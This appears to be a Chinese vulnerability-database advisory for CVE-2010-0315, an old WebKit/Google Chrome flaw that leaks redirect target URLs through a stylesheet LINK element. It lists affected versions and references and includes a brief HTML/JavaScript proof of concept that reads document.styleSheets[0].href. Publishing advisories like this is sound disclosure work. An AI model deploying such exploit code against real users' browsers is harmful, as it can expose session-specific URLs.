Google Chrome WebKit LINK元素HREF属性URL重定向漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118936 漏洞类型 其他
发布时间 2010-01-22 更新时间 2010-01-25
CVE编号 CVE-2010-0315 CNNVD-ID CNNVD-201001-139
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/33562
https://www.securityfocus.com/bid/37917
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-139
|漏洞详情
GoogleChrome4.0.249.89之前版本中使用的WebKitr53607之前版本中存在URL重定向漏洞。远程攻击者通过设置样式表中的LINK元素的HREF属性的网络站点的URL,并读取document.styleSheets[0].href属性值,以发现网站特定用户会话中一个重定向目标URL。
|漏洞EXP
source: http://www.securityfocus.com/bid/37917/info

Google Chrome is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks. 

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>
|受影响的产品
Google Chrome 3.0.195 .33 Google Chrome 3.0.195 .32 Google Chrome 3.0.195 .24 Google Chrome 3.0.195 .21 Google Chrome 3.0 Beta
|参考资料

来源:bugs.webkit.org
链接:https://bugs.webkit.org/show_bug.cgi?id=33683
来源:XF
名称:googlechrome-iframe-info-disc(56215)
链接:http://xforce.iss.net/xforce/xfdb/56215
来源:VUPEN
名称:ADV-2010-0361
链接:http://www.vupen.com/english/advisories/2010/0361
来源:BID
名称:38177
链接:http://www.securityfocus.com/bid/38177
来源:trac.webkit.org
链接:http://trac.webkit.org/changeset/53607
来源:sites.google.com
链接:http://sites.google.com/a/chromium.org/dev/Home/chromium-security/chromium-security-bugs
来源:SECTRACK
名称:1023583
链接:http://securitytracker.com/id?1023583
来源:SECUNIA
名称:38545
链接:http://secunia.com/advisories/38545
来源:MISC
链接:http://nomoreroot.blogspot.com/2010/01/little-bug-in-safari-and-google-chrome.html
来源:googlechromereleases.blogspot.com
链接:http://googlechromereleases.blogspot.com/2010/02/stable-channel-update.html
来源:code.google.com
链接:http://code.google.com/p/chromium/issues/detail?id=32309